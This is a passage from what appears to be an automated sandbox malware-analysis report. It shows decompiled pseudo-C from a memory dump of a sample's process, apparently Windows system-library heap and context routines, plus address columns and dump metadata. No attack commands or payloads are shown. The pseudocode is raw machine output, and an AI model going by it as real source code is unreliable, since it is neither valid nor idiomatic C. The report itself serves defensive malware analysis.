						if(_t76 == _t119) {
							break;
						}
						_t119 = _t76;
					}
					_t115 = _v24;
					if(_v20 == 2) {
						E017D00C2(_v16, 0, _t134);
					}
					_t135 = 1;
				}
				if(_t155 == 0) {
					_t77 = _v5;
					if(_v5 <= 7) {
						L17:
						_t156 = E017AB433( *((intOrPtr*)(_v12 + 0xc)), _t77, _a4, _a8);
						if(_t156 != 0) {
							asm("lock inc dword [eax]");
						}
						L11:
						_t137 =  *(_t115 + 0x14) & 0x0000ffff;
						if(_t137 > 0x40) {
							_t148 =  *(_t115 + 0x18) & 0x0000ffff;
							if(_t137 >= (( *(_t115 + 0x16) & 0x0000ffff) >> 1) + ( *(_t115 + 0x16) & 0x0000ffff) || _t148 >= _t137 - (_t137 >> 1)) {
								L23:
								 *(_t115 + 0x14) = 0;
								 *(_t115 + 0x16) = 0;
								 *(_t115 + 0x18) = 0;
								goto L12;
							} else {
								if( *((intOrPtr*)(_t115 + 0xc)) >= 2) {
									if( *((intOrPtr*)(_t115 + 0x10)) <= 2) {
										goto L23;
									}
									L26:
									asm("lock cmpxchg [edx], ecx");
									goto L23;
								}
								goto L26;
							}
						}
						L12:
						return _t156;
					}
					_t159 = _v28 + 0xffffff38;
					_v28 = _t159;
					_t150 = 0x1886dc0 + (_t159 >> 0x00000002 & 0x0000001f) * 4;
					E017B2280(_t159 >> 0x00000002 & 0x0000001f, 0x1886dc0 + (_t159 >> 0x00000002 & 0x0000001f) * 4);
					_t156 =  *_t159;
					if(_t156 != 0) {
						_t124 = _v28;
						 *_t124 =  *_t156;
						 *((intOrPtr*)(_t124 + 4)) =  *((intOrPtr*)(_t124 + 4)) + 0xffff;
					}
					E017AFFB0(_t115, _t150, _t150);
					if(_t156 != 0) {
						_v5 = _v5 - 1;
						_t135 = 1;
						L5:
						if(_t156 == 0) {
							goto L16;
						}
						_t141 = _t135 <<  *(_t156 + 8);
						if(_t141 > 0x78000) {
							_t141 = 0x78000;
						}
						_t152 = ( *(_t156 + 0xa) & 0x0000ffff) + _t141;
						_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
						if(_t101 != 0) {
							if( *_t101 == 0) {
								goto L8;
							}
							_t102 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							goto L9;
						} else {
							L8:
							_t102 = 0x7ffe0380;
							L9:
							if( *_t102 != 0) {
								if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
									L018518CA(_t115,  *((intOrPtr*)(_v12 + 0xc)), _t156, _t152, _a4);
								}
							}
							asm("lock xadd [eax], edi");
							goto L11;
						}
					} else {
						L16:
						_t77 = _v5;
						goto L17;
					}
				}
				 *(_t115 + 0x18) = ( *(_t115 + 0x18) & 0x0000ffff) + 1;
				goto L5;
			}




























                                                          0x017af37a
                                                          0x017af37d
                                                          0x017af386
                                                          0x017af389
                                                          0x017af38f
                                                          0x017af39a
                                                          0x017af39d
                                                          0x017af3b3
                                                          0x017af3b6
                                                          0x017af3bb
                                                          0x017af3bf
                                                          0x017af3c3
                                                          0x017af3ca
                                                          0x017af3ca
                                                          0x017af3d7
                                                          0x017af3db
                                                          0x017af3df
                                                          0x017fbc33
                                                          0x017fbc37
                                                          0x017fbc3d
                                                          0x017fbc40
                                                          0x017fbc4c
                                                          0x017fbc50
                                                          0x017fbc56
                                                          0x00000000
                                                          0x00000000
                                                          0x017fbc58
                                                          0x017fbc58
                                                          0x017fbc60
                                                          0x017fbc63
                                                          0x017fbc6b
                                                          0x017fbc6b
                                                          0x017fbc70
                                                          0x017fbc70
                                                          0x017af3e7
                                                          0x017af45a
                                                          0x017af45f
                                                          0x017af495
                                                          0x017af4a8
                                                          0x017af4ac
                                                          0x017af4ba
                                                          0x017af4ba
                                                          0x017af43f
                                                          0x017af443
                                                          0x017af449
                                                          0x017af4e2
                                                          0x017af4ee
                                                          0x017af4fa
                                                          0x017af4fc
                                                          0x017af500
                                                          0x017af504
                                                          0x00000000
                                                          0x017af50d
                                                          0x017af516
                                                          0x017af52a
                                                          0x00000000
                                                          0x00000000
                                                          0x017af51b
                                                          0x017af51b
                                                          0x00000000
                                                          0x017af51b
                                                          0x00000000
                                                          0x017af518
                                                          0x017af4ee
                                                          0x017af44f
                                                          0x017af457
                                                          0x017af457
                                                          0x017af464
                                                          0x017af46c
                                                          0x017af475
                                                          0x017af47d
                                                          0x017af482
                                                          0x017af486
                                                          0x017af4bf
                                                          0x017af4c4
                                                          0x017af4cb
                                                          0x017af4cb
                                                          0x017af489
                                                          0x017af490
                                                          0x017af4d1
                                                          0x017af4d4
                                                          0x017af3f5
                                                          0x017af3f7
                                                          0x00000000
                                                          0x00000000
                                                          0x017af400
                                                          0x017af408
                                                          0x017fbc7a
                                                          0x017fbc7a
                                                          0x017af418
                                                          0x017af41a
                                                          0x017af41f
                                                          0x017fbc87
                                                          0x00000000
                                                          0x00000000
                                                          0x017fbc96
                                                          0x00000000
                                                          0x017af425
                                                          0x017af425
                                                          0x017af425
                                                          0x017af42a
                                                          0x017af42d
                                                          0x017fbcad
                                                          0x017fbcbf
                                                          0x017fbcbf
                                                          0x017fbcad
                                                          0x017af43b
                                                          0x00000000
                                                          0x017af43b
                                                          0x017af492
                                                          0x017af492
                                                          0x017af492
                                                          0x00000000
                                                          0x017af492
                                                          0x017af490
                                                          0x017af3f1
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1200e4aed89258c797c1afc75f6df850d8bbd5843e01fd19ad6493c1f3333638
                                                          • Instruction ID: d0317ef870de52d6d39f6d1fad027680879f36979a648a0c31ac4932d71baa15
                                                          • Opcode Fuzzy Hash: 1200e4aed89258c797c1afc75f6df850d8bbd5843e01fd19ad6493c1f3333638
                                                          • Instruction Fuzzy Hash: 3D61EE32A052158BCB29CF5CC4807AEFBB1EF85710B9982A9E955DF345DB34D942CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017CFAB0 Relevance: .2, Instructions: 191COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 80%
                                                          			E017CFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E017AEEF0(0x1887b60);
					_t134 =  *0x1887b84; // 0x771a7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1887b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1887b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E017A6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E017A76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = L01838938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push(0x1783750);
														E0179B150();
													}
													_t116 = L01836D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E017A75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t122 = E017A38A4( *0x1888638, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E017A76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E017A76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													E017CFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	E017A70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E017CFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E017CFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E017CFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E017CFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E017CFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1887b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1887b84 = _t75;
						_t73 = E017AEB70(_t134, 0x1887b60);
						if( *0x1887b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E017AFF60( *0x1887b20);
							}
						}
						goto L5;
					}
				}
			}
















































                                                          0x017cfab0
                                                          0x017cfab2
                                                          0x017cfab3
                                                          0x017cfab4
                                                          0x017cfabc
                                                          0x017cfac0
                                                          0x017cfb14
                                                          0x017cfb17
                                                          0x017cfac2
                                                          0x017cfac8
                                                          0x017cfacd
                                                          0x017cfad3
                                                          0x017cfad3
                                                          0x017cfadd
                                                          0x017cfb18
                                                          0x017cfb1b
                                                          0x017cfb1d
                                                          0x017cfb1e
                                                          0x017cfb1f
                                                          0x017cfb20
                                                          0x017cfb21
                                                          0x017cfb22
                                                          0x017cfb23
                                                          0x017cfb24
                                                          0x017cfb25
                                                          0x017cfb26
                                                          0x017cfb27
                                                          0x017cfb28
                                                          0x017cfb29
                                                          0x017cfb2a
                                                          0x017cfb2b
                                                          0x017cfb2c
                                                          0x017cfb2d
                                                          0x017cfb2e
                                                          0x017cfb2f
                                                          0x017cfb3a
                                                          0x017cfb3b
                                                          0x017cfb3e
                                                          0x017cfb41
                                                          0x017cfb44
                                                          0x017cfb47
                                                          0x017cfb4a
                                                          0x017cfb4d
                                                          0x017cfb53
                                                          0x0180bdcb
                                                          0x0180bdcb
                                                          0x017cfb59
                                                          0x017cfb5b
                                                          0x017cfb5b
                                                          0x017cfb5e
                                                          0x0180bdd5
                                                          0x0180bdd8
                                                          0x00000000
                                                          0x0180bdda
                                                          0x00000000
                                                          0x0180bdda
                                                          0x017cfb64
                                                          0x017cfb64
                                                          0x017cfb64
                                                          0x017cfb67
                                                          0x017cfb6e
                                                          0x017cfb70
                                                          0x017cfb72
                                                          0x00000000
                                                          0x017cfb78
                                                          0x017cfb7a
                                                          0x017cfb7a
                                                          0x017cfb7d
                                                          0x017cfb80
                                                          0x0180bddf
                                                          0x0180bde1
                                                          0x00000000
                                                          0x0180bde3
                                                          0x00000000
                                                          0x0180bde3
                                                          0x017cfb86
                                                          0x017cfb86
                                                          0x017cfb86
                                                          0x017cfb8b
                                                          0x017cfb90
                                                          0x017cfb92
                                                          0x017cfb94
                                                          0x017cfb9a
                                                          0x017cfb9b
                                                          0x017cfba1
                                                          0x0180bde8
                                                          0x0180bdeb
                                                          0x0180bded
                                                          0x0180beb5
                                                          0x0180beb5
                                                          0x0180bebb
                                                          0x0180bebd
                                                          0x0180bec3
                                                          0x0180bed2
                                                          0x0180bedd
                                                          0x0180bedd
                                                          0x0180beed
                                                          0x00000000
                                                          0x0180bdf3
                                                          0x0180bdfe
                                                          0x0180be06
                                                          0x0180be0b
                                                          0x0180be0d
                                                          0x0180be0f
                                                          0x0180be14
                                                          0x0180be19
                                                          0x0180be20
                                                          0x0180be25
                                                          0x0180be27
                                                          0x0180be35
                                                          0x0180be39
                                                          0x0180be46
                                                          0x0180be4f
                                                          0x0180be54
                                                          0x0180be56
                                                          0x0180bef8
                                                          0x0180bef8
                                                          0x00000000
                                                          0x0180be5c
                                                          0x0180be5c
                                                          0x0180be60
                                                          0x00000000
                                                          0x0180be66
                                                          0x0180be7f
                                                          0x0180be84
                                                          0x0180be87
                                                          0x0180be89
                                                          0x0180be8b
                                                          0x0180be99
                                                          0x0180be9d
                                                          0x0180bea0
                                                          0x0180beac
                                                          0x0180beaf
                                                          0x0180beb1
                                                          0x0180beb3
                                                          0x0180beb3
                                                          0x00000000
                                                          0x0180bea2
                                                          0x0180bea2
                                                          0x00000000
                                                          0x0180bea2
                                                          0x0180be8d
                                                          0x0180be8d
                                                          0x0180be92
                                                          0x00000000
                                                          0x0180be92
                                                          0x0180be8b
                                                          0x0180be60
                                                          0x0180be3b
                                                          0x0180be3b
                                                          0x0180be3e
                                                          0x00000000
                                                          0x0180be40
                                                          0x0180be40
                                                          0x0180be44
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0180be44
                                                          0x0180be3e
                                                          0x0180be29
                                                          0x0180be29
                                                          0x00000000
                                                          0x0180be29
                                                          0x0180be27
                                                          0x00000000
                                                          0x017cfba7
                                                          0x017cfba7
                                                          0x017cfbab
                                                          0x0180bf02
                                                          0x017cfbb1
                                                          0x017cfbb1
                                                          0x017cfbb8
                                                          0x017cfbbd
                                                          0x017cfbbd
                                                          0x017cfbbf
                                                          0x017cfbbf
                                                          0x017cfbc5
                                                          0x017cfbcb
                                                          0x017cfbf8
                                                          0x017cfbf8
                                                          0x017cfbfa
                                                          0x00000000
                                                          0x017cfc00
                                                          0x017cfc00
                                                          0x017cfc03
                                                          0x00000000
                                                          0x017cfc09
                                                          0x017cfc09
                                                          0x017cfc0f
                                                          0x017cfc15
                                                          0x017cfc23
                                                          0x017cfc23
                                                          0x017cfc25
                                                          0x017cfc27
                                                          0x017cfc75
                                                          0x017cfc7c
                                                          0x017cfc84
                                                          0x00000000
                                                          0x017cfc29
                                                          0x017cfc29
                                                          0x017cfc2d
                                                          0x017cfc30
                                                          0x0180bf0f
                                                          0x00000000
                                                          0x017cfc36
                                                          0x017cfc38
                                                          0x017cfc3b
                                                          0x017cfc41
                                                          0x0180bf17
                                                          0x0180bf19
                                                          0x0180bf48
                                                          0x0180bf4b
                                                          0x00000000
                                                          0x0180bf1b
                                                          0x0180bf22
                                                          0x0180bf24
                                                          0x0180bf26
                                                          0x00000000
                                                          0x0180bf2c
                                                          0x0180bf37
                                                          0x0180bf39
                                                          0x0180bf3b
                                                          0x00000000
                                                          0x0180bf41
                                                          0x0180bf41
                                                          0x0180bf41
                                                          0x0180bf41
                                                          0x0180bf45
                                                          0x00000000
                                                          0x0180bf45
                                                          0x0180bf3b
                                                          0x0180bf26
                                                          0x00000000
                                                          0x017cfc47
                                                          0x017cfc47
                                                          0x017cfc49
                                                          0x017cfcb2
                                                          0x017cfcb4
                                                          0x017cfcb6
                                                          0x017cfcdc
                                                          0x017cfcdc
                                                          0x00000000
                                                          0x017cfcb8
                                                          0x017cfcc3
                                                          0x017cfcc5
                                                          0x017cfcc7
                                                          0x00000000
                                                          0x017cfcc9
                                                          0x017cfcc9
                                                          0x017cfccd
                                                          0x00000000
                                                          0x017cfccd
                                                          0x017cfcc7
                                                          0x00000000
                                                          0x017cfc4b
                                                          0x017cfc4b
                                                          0x017cfc4e
                                                          0x017cfc4e
                                                          0x017cfc51
                                                          0x017cfc51
                                                          0x017cfc54
                                                          0x017cfc5a
                                                          0x017cfc5c
                                                          0x017cfc5f
                                                          0x017cfc61
                                                          0x017cfc63
                                                          0x017cfc65
                                                          0x017cfc67
                                                          0x017cfc6e
                                                          0x017cfc72
                                                          0x017cfc72
                                                          0x017cfc72
                                                          0x017cfc72
                                                          0x017cfc67
                                                          0x017cfc61
                                                          0x00000000
                                                          0x017cfc5a
                                                          0x017cfc49
                                                          0x017cfc41
                                                          0x017cfc30
                                                          0x017cfc27
                                                          0x017cfc03
                                                          0x017cfbcd
                                                          0x017cfbd3
                                                          0x017cfbd9
                                                          0x017cfbdc
                                                          0x017cfbde
                                                          0x017cfc99
                                                          0x017cfc9b
                                                          0x017cfc9d
                                                          0x017cfcd5
                                                          0x017cfcd5
                                                          0x017cfc89
                                                          0x017cfc89
                                                          0x00000000
                                                          0x017cfc9f
                                                          0x017cfc9f
                                                          0x017cfca3
                                                          0x00000000
                                                          0x017cfca3
                                                          0x00000000
                                                          0x017cfbe4
                                                          0x017cfbe4
                                                          0x017cfbe4
                                                          0x017cfbe4
                                                          0x017cfbe9
                                                          0x017cfbf2
                                                          0x00000000
                                                          0x017cfbf2
                                                          0x017cfbde
                                                          0x017cfbcb
                                                          0x017cfbab
                                                          0x017cfc8b
                                                          0x017cfc8b
                                                          0x017cfc8c
                                                          0x017cfb80
                                                          0x017cfb72
                                                          0x017cfb5e
                                                          0x017cfc8d
                                                          0x017cfc91
                                                          0x017cfadf
                                                          0x017cfadf
                                                          0x017cfae1
                                                          0x017cfae4
                                                          0x017cfae7
                                                          0x017cfaec
                                                          0x017cfaf8
                                                          0x017cfb00
                                                          0x017cfb07
                                                          0x017cfb0f
                                                          0x017cfb0f
                                                          0x017cfb07
                                                          0x00000000
                                                          0x017cfaf8
                                                          0x017cfadd

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
